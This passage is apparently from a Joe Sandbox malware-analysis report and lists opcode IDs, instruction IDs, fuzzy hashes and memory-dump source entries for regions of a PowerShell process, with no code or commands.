                                                                                                                    • Opcode ID: faa72056b23f4666ed7f05aa86772a0f70fd84c7ca456828b6b57aaed1443a77
                                                                                                                    • Instruction ID: bcef5379100ea3313cdf084a82322ceb02023ec338dbb171ba13715ecfdc43c9
                                                                                                                    • Opcode Fuzzy Hash: faa72056b23f4666ed7f05aa86772a0f70fd84c7ca456828b6b57aaed1443a77
                                                                                                                    • Instruction Fuzzy Hash: 1B01A73020CB0C4FD748EF0CE051AA5B3E0FF85320F10066DE58AC36A1DA32E882CB45
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1837077114.00007FFD9BD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BD80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9bd80000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6c7248435ba749c02c71e6d0d266bf35cceabce8e0ad98d7f64a993b3c7cfb3e
                                                                                                                    • Instruction ID: 306f3ea558141f0ae2e98a0a12ca52115d9c62a8aa22ff259e347ab7073b2c91
                                                                                                                    • Opcode Fuzzy Hash: 6c7248435ba749c02c71e6d0d266bf35cceabce8e0ad98d7f64a993b3c7cfb3e
                                                                                                                    • Instruction Fuzzy Hash: CBF09A32B0E9098FD769EA4CE4919B873E0FF09320B1900B6E25DC75A7CA36AC05CB40
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1837077114.00007FFD9BD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BD80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9bd80000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0878650b2a9cd62e9eb6cd45ee6be6c2dfd5effe174ce545c98cc56152efd1b6
                                                                                                                    • Instruction ID: a42c90e7c6420953d05a4fe6d64c50dc943ab9b35c023996dd1015e283dc0277
                                                                                                                    • Opcode Fuzzy Hash: 0878650b2a9cd62e9eb6cd45ee6be6c2dfd5effe174ce545c98cc56152efd1b6
                                                                                                                    • Instruction Fuzzy Hash: 9DF05431A0D5494FD799EA9CD4518A477E0EF0532571510B6E25DC75B7CA35AC40C740
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1833640585.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9bad0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: afeb082aeffdfdbbf52cc026658f49245bbff744f1b2381403a376fa27dfa923
                                                                                                                    • Instruction ID: 6337700a6c7a8571ffe8fcfc3847803bc6671640733350ef0cf565f1a9658cb7
                                                                                                                    • Opcode Fuzzy Hash: afeb082aeffdfdbbf52cc026658f49245bbff744f1b2381403a376fa27dfa923
                                                                                                                    • Instruction Fuzzy Hash: 2FF0E93080868D8FDB1AEF6488195E5BFA0FF26310B0502EBE459C71B1DB749554CBC2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1837077114.00007FFD9BD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BD80000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9bd80000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 0PI$D5
                                                                                                                    • API String ID: 0-4014747524
                                                                                                                    • Opcode ID: 42407ba46af9c777a67ebb18b423ebe3e0e107b052d017846e756a0114e54f0e
                                                                                                                    • Instruction ID: 1223d0557a323b3fb4d01e762e1088457efec06772ae2b3deb9b4b799781d745
                                                                                                                    • Opcode Fuzzy Hash: 42407ba46af9c777a67ebb18b423ebe3e0e107b052d017846e756a0114e54f0e
                                                                                                                    • Instruction Fuzzy Hash: 8E51FB21A0FFC94FD75EC67888649653F91EF5631075A01FED08ACB0E3D92AAD46C391
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1834207572.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9bba0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0e291051d3637355e200a8052f698468c0cd5e6beb9f5c1033da23768a432df5
                                                                                                                    • Instruction ID: 452ac2d2c442f820048e50349e5f690f0937a4ead9103e3f114ac458a30ebda5
                                                                                                                    • Opcode Fuzzy Hash: 0e291051d3637355e200a8052f698468c0cd5e6beb9f5c1033da23768a432df5
                                                                                                                    • Instruction Fuzzy Hash: 99924472E0EA8E4FE7A5DA6888756647BE1FFA5308B1901BED05DC71E3DD29AC41C340